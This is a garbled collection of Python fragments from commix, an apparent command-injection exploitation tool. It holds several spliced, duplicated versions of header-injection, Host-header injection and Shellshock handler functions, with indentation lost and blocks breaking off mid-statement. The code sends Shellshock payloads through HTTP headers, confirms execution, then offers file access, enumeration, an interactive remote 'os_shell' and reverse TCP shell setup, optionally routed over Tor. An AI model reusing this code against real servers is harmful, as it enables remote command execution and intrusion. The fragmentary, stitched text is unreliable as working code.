except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + settings.print_error_msg(err_msg)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
def custom_header_injection(url, vuln_parameter, payload):
def inject_custom_header(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = _urllib.request.build_opener()
else:
opener = _urllib.request.build_opener(proxy)
# Check if defined POST data
if menu.options.data:
menu.options.data = settings.USER_DEFINED_POST_DATA
request = _urllib.request.Request(url, menu.options.data.encode(settings.UNICODE_ENCODING))
else:
url = parameters.get_url_part(url)
request = _urllib.request.Request(url)
#Check if defined extra headers.
headers.do_check(request)
payload = checks.newline_fixation(payload)
request.add_header(settings.CUSTOM_HEADER_NAME, payload)
try:
headers.check_http_traffic(request)
response = opener.open(request)
return response
except ValueError:
pass
if settings.TIME_RELATIVE_ATTACK :
start = 0
end = 0
start = time.time()
proxy = None
#response = inject_custom_header(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = _urllib.request.ProxyHandler({settings.SCHEME : menu.options.proxy})
response = inject_custom_header(url, vuln_parameter, payload, proxy)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print("")
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except _urllib.error.URLError as err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err_msg))
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
proxy = _urllib.request.ProxyHandler({settings.SCHEME:settings.PRIVOXY_IP + ":" + settings.PRIVOXY_PORT})
response = inject_custom_header(url, vuln_parameter, payload, proxy)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print("")
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except _urllib.error.URLError as err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err_msg))
raise SystemExit()
else:
try:
response = inject_custom_header(url, vuln_parameter, payload, proxy)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print("")
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except _urllib.error.URLError as err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err_msg))
raise SystemExit()
if settings.TIME_RELATIVE_ATTACK :
end = time.time()
how_long = int(end - start)
return how_long
else:
return response
def custom_header_injection(url, vuln_parameter, payload):
def inject_custom_header(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
# Check if defined POST data
if menu.options.data:
menu.options.data = settings.USER_DEFINED_POST_DATA
request = urllib2.Request(url, menu.options.data)
else:
url = parameters.get_url_part(url)
request = urllib2.Request(url)
#Check if defined extra headers.
headers.do_check(request)
payload = urllib.unquote(payload)
# Fix for %0a, %0d%0a separators
if payload[:1] == "\n":
payload = urllib.quote(payload[:1]) + payload[1:]
elif payload[:2] == "\r\n":
payload = urllib.quote(payload[:2]) + payload[2:]
request.add_header(settings.CUSTOM_HEADER_NAME, payload)
try:
headers.check_http_traffic(request)
response = opener.open(request)
return response
except ValueError:
pass
if settings.TIME_RELATIVE_ATTACK :
start = 0
end = 0
start = time.time()
proxy = None
#response = inject_custom_header(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
response = inject_custom_header(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print ""
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err_msg)
raise SystemExit()
def host_injection(url, vuln_parameter, payload):
payload = urlparse.urlparse(url).hostname + payload
def inject_host(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
# Check if defined POST data
if menu.options.data:
menu.options.data = settings.USER_DEFINED_POST_DATA
request = urllib2.Request(url, menu.options.data)
else:
url = parameters.get_url_part(url)
request = urllib2.Request(url)
#Check if defined extra headers.
headers.do_check(request)
payload = checks.newline_fixation(payload)
request.add_header('Host', payload)
try:
headers.check_http_traffic(request)
response = opener.open(request)
return response
except ValueError:
pass
if settings.TIME_RELATIVE_ATTACK :
start = 0
end = 0
start = time.time()
proxy = None
#response = inject_host(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.SCHEME : menu.options.proxy})
response = inject_host(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print ""
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err_msg)
raise SystemExit()
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
sys.stdout.write("(*) Testing the " + technique + "... ")
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload + Style.RESET_ALL)
header = {check_header: payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i * 100) / total)
float_percent = "{0:.1f}".format(
round(((i * 100) / (total * 1.0)), 2))
if str(float_percent) == "100.0":
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent) + "%"
sys.stdout.write("\r(*) Testing the " + technique +
"... " + "[ " + percent + " ]")
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(
export_injection_info, filename, injection_type,
technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename,
check_header,
vuln_parameter, payload)
logs.update_payload(filename, counter, payload)
if cve in response.info():
no_result = False
print Style.BRIGHT + "\n(!) The (" + check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." + Style.RESET_ALL
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title(
) + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
) + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
if not menu.options.verbose:
print ""
# Enumeration options.
if settings.ENUMERATION_DONE == True:
if menu.options.verbose:
print ""
while True:
enumerate_again = raw_input(
"(?) Do you want to enumerate again? [Y/n/q] > "
).lower()
if enumerate_again in settings.CHOISE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOISE_NO:
break
elif enumerate_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True:
while True:
file_access_again = raw_input(
"(?) Do you want to access files again? [Y/n/q] > "
).lower()
if file_access_again in settings.CHOISE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOISE_NO:
break
elif file_access_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
else:
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
if menu.options.verbose:
print ""
gotshell = raw_input(
"(?) Do you want a Pseudo-Terminal? [Y/n/q] > "
).lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(
menu.tab_completer)
# MacOSX tab compliter
if getattr(
readline, '__doc__', ''
) is not None and 'libedit' in getattr(
readline, '__doc__', ''):
readline.parse_and_bind(
"bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind(
"tab: complete")
cmd = raw_input("""commix(""" +
Style.BRIGHT +
Fore.RED +
"""os_shell""" +
Style.RESET_ALL +
""") > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower(
) in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(
cmd.lower(), technique,
go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp(
)
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(
lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(
lhost, lport)
result = checks.check_reverse_tcp_options(
cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
shell = cmd_exec(
url, cmd, cve,
check_header, filename)
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
pass
else:
shell = cmd_exec(
url, cmd, cve, check_header,
filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(
technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
continue
break
else:
continue
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
info_msg = "Testing the " + technique + ". "
if settings.VERBOSITY_LEVEL >= 2:
info_msg = info_msg + "\n"
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write("\n" + settings.print_payload(payload))
elif settings.VERBOSITY_LEVEL >= 2:
debug_msg = "Generating payload for the injection."
print(settings.print_debug_msg(debug_msg))
print(settings.print_payload(payload))
header = {check_header : payload}
request = _urllib.request.Request(url, None, header)
if check_header == "User-Agent":
menu.options.agent = payload
else:
menu.options.agent = default_user_agent
log_http_headers.do_check(request)
log_http_headers.check_http_traffic(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
response = proxy.use_proxy(request)
# Check if defined Tor.
elif menu.options.tor:
response = tor.use_tor(request)
else:
response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT)
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
percent = settings.FAIL_STATUS
else:
percent = settings.info_msg
no_result = False
elif len(response.info()) > 0 and cve in response.info():
percent = settings.info_msg
no_result = False
else:
percent = str(float_percent)+ "%"
if settings.VERBOSITY_LEVEL == 0:
info_msg = "Testing the " + technique + "." + "" + percent + ""
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
if no_result == False:
# Check injection state
settings.DETECTION_PHASE = False
settings.EXPLOITATION_PHASE = True
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
vuln_parameter = "HTTP Header"
the_type = " " + vuln_parameter
check_header = " " + check_header
vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
check_header = check_header[1:]
logs.update_payload(filename, counter, payload)
if settings.VERBOSITY_LEVEL != 0:
if settings.VERBOSITY_LEVEL == 1:
print(settings.SINGLE_WHITESPACE)
checks.total_of_requests()
info_msg = "The (" + check_header + ") '"
info_msg += url + Style.RESET_ALL + Style.BRIGHT
info_msg += "' seems vulnerable via " + technique + "."
if settings.VERBOSITY_LEVEL == 0:
print(settings.SINGLE_WHITESPACE)
print(settings.print_bold_info_msg(info_msg))
sub_content = "\"" + payload + "\""
print(settings.print_sub_content(sub_content))
# Enumeration options.
if settings.ENUMERATION_DONE == True :
if settings.VERBOSITY_LEVEL != 0:
print(settings.SINGLE_WHITESPACE)
while True:
if not menu.options.batch:
question_msg = "Do you want to enumerate again? [Y/n] > "
enumerate_again = _input(settings.print_question_msg(question_msg))
else:
enumerate_again = ""
if len(enumerate_again) == 0:
enumerate_again = "Y"
if enumerate_again in settings.CHOICE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOICE_NO:
break
elif enumerate_again in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + enumerate_again + "' is not a valid answer."
print(settings.print_error_msg(err_msg))
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True :
while True:
if not menu.options.batch:
question_msg = "Do you want to access files again? [Y/n] > "
file_access_again = _input(settings.print_question_msg(question_msg))
else:
file_access_again= ""
if len(file_access_again) == 0:
file_access_again = "Y"
if file_access_again in settings.CHOICE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOICE_NO:
break
elif file_access_again in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + file_access_again + "' is not a valid answer."
print(settings.print_error_msg(err_msg))
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
print("\n") + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
raise SystemExit()
else:
# Pseudo-Terminal shell
print(settings.SINGLE_WHITESPACE)
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if not menu.options.batch:
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
gotshell = _input(settings.print_question_msg(question_msg))
else:
gotshell= ""
if len(gotshell) == 0:
gotshell= "Y"
if gotshell in settings.CHOICE_YES:
# if not menu.options.batch:
# print(settings.SINGLE_WHITESPACE)
print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)")
if settings.READLINE_ERROR:
checks.no_readline_module()
while True:
try:
if not settings.READLINE_ERROR:
checks.tab_autocompleter()
sys.stdout.write(settings.OS_SHELL)
cmd = _input()
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
if go_back:
break
else:
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if shell != "":
# Update logs with executed cmds and execution results.
logs.executed_command(filename, cmd, shell)
print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n")
else:
debug_msg = "Executing the '" + cmd + "' command. "
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
elif settings.VERBOSITY_LEVEL >= 2:
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
err_msg = "The '" + cmd + "' command, does not return any output."
print(settings.print_critical_msg(err_msg) + "\n")
except KeyboardInterrupt:
raise
except SystemExit:
raise
except EOFError:
err_msg = "Exiting, due to EOFError."
print(settings.print_error_msg(err_msg))
raise
except TypeError:
break
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print(settings.print_error_msg(err_msg))
continue
break
else:
continue
if no_result:
if settings.VERBOSITY_LEVEL != 2:
print(settings.SINGLE_WHITESPACE)
err_msg = "All tested HTTP headers appear to be not injectable."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(err_msg.code) == settings.BAD_REQUEST:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n" + settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
except _urllib.error.URLError as err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL != 0 and settings.LOAD_SESSION == False:
print(settings.SINGLE_WHITESPACE)
print(settings.print_critical_msg(err_msg))
raise SystemExit()
except _http_client.IncompleteRead as err_msg:
print(settings.print_critical_msg(err_msg + "."))
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
err_msg = "The target host is not responding."
err_msg += " Please ensure that is up and try again."
print "\n" + settings.print_critical_msg(err_msg)
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print settings.print_error_msg(err)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
err_msg = "The target host is not responding."
err_msg += " Please ensure that is up and try again."
print "\n" + settings.print_critical_msg(err_msg)
raise SystemExit()
else:
try:
response = urllib2.urlopen(request)
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
info_msg = "Testing the " + technique + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write("\n" + settings.print_payload(payload))
elif settings.VERBOSITY_LEVEL > 1:
info_msg = "Generating a payload for injection..."
print "\n" + settings.print_info_msg(info_msg)
print settings.print_payload(payload)
header = {check_header: payload}
request = urllib2.Request(url, None, header)
log_http_headers.check_http_traffic(request)
response = urllib2.urlopen(request)
percent = ((i * 100) / total)
float_percent = "{0:.1f}".format(
round(((i * 100) / (total * 1.0)), 2))
if str(float_percent) == "100.0":
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
no_result = False
elif len(response.info()) > 0 and cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
no_result = False
elif len(response.read()) > 0 and cve in response.read():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
no_result = False
else:
percent = str(float_percent) + "%"
if not settings.VERBOSITY_LEVEL >= 1:
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
if no_result == False:
# Check injection state
settings.DETECTION_PHASE = False
settings.EXPLOITATION_PHASE = True
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(
export_injection_info, filename, injection_type,
technique)
#if vp_flag == True:
vuln_parameter = "HTTP Header"
the_type = " " + vuln_parameter
check_header = " " + check_header
vp_flag = logs.add_parameter(vp_flag, filename, the_type,
check_header,
http_request_method,
vuln_parameter, payload)
check_header = check_header[1:]
logs.update_payload(filename, counter, payload)
success_msg = "The (" + check_header + ") '"
success_msg += url + Style.RESET_ALL + Style.BRIGHT
success_msg += "' seems vulnerable via " + technique + "."
print "\n" + settings.print_success_msg(success_msg)
print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL
if not settings.VERBOSITY_LEVEL >= 1:
print ""
# Enumeration options.
if settings.ENUMERATION_DONE == True:
if settings.VERBOSITY_LEVEL >= 1:
print ""
while True:
if not menu.options.batch:
question_msg = "Do you want to enumerate again? [Y/n] > "
sys.stdout.write(
settings.print_question_msg(question_msg))
enumerate_again = sys.stdin.readline().replace(
"\n", "").lower()
else:
enumerate_again = ""
if len(enumerate_again) == 0:
enumerate_again = "y"
if enumerate_again in settings.CHOICE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOICE_NO:
break
elif enumerate_again in settings.CHOICE_QUIT:
sys.exit(0)
else:
err_msg = "'" + enumerate_again + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True:
while True:
if not menu.options.batch:
question_msg = "Do you want to access files again? [Y/n] > "
sys.stdout.write(
settings.print_question_msg(question_msg))
file_access_again = sys.stdin.readline(
).replace("\n", "").lower()
else:
file_access_again = ""
if len(file_access_again) == 0:
file_access_again = "y"
if file_access_again in settings.CHOICE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOICE_NO:
break
elif file_access_again in settings.CHOICE_QUIT:
sys.exit(0)
else:
err_msg = "'" + file_access_again + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell, payload = cmd_exec(url, cmd, cve, check_header,
filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
else:
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
if settings.VERBOSITY_LEVEL >= 1:
print ""
if not menu.options.batch:
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
sys.stdout.write(
settings.print_question_msg(question_msg))
gotshell = sys.stdin.readline().replace(
"\n", "").lower()
else:
gotshell = ""
if len(gotshell) == 0:
gotshell = "y"
if gotshell in settings.CHOICE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
if not readline_error:
# Tab compliter
readline.set_completer(
menu.tab_completer)
# MacOSX tab compliter
if getattr(
readline, '__doc__', ''
) is not None and 'libedit' in getattr(
readline, '__doc__', ''):
readline.parse_and_bind(
"bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind(
"tab: complete")
cmd = raw_input("""commix(""" +
Style.BRIGHT +
Fore.RED +
"""os_shell""" +
Style.RESET_ALL +
""") > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower(
) in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(
cmd.lower(), technique,
go_back, no_result)
go_back, go_back_again = check_options(
url, cmd, cve, check_header,
filename, os_shell_option,
http_request_method, go_back,
go_back_again)
if go_back:
break
else:
shell, payload = cmd_exec(
url, cmd, cve, check_header,
filename)
if shell != "":
# Update logs with executed cmds and execution results.
logs.executed_command(
filename, cmd, shell)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
info_msg = "Executing the '" + cmd + "' command... "
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write(
"\n" + settings.
print_info_msg(
info_msg))
elif settings.VERBOSITY_LEVEL > 1:
sys.stdout.write(
settings.
print_info_msg(
info_msg))
sys.stdout.flush()
sys.stdout.write(
"\n" +
settings.print_payload(
payload) + "\n")
#print "\n" + settings.print_payload(payload)
err_msg = "The '" + cmd + "' command, does not return any output."
print settings.print_critical_msg(
err_msg) + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(
technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
sys.exit(0)
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg)
continue
break
else:
continue
if no_result:
print ""
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
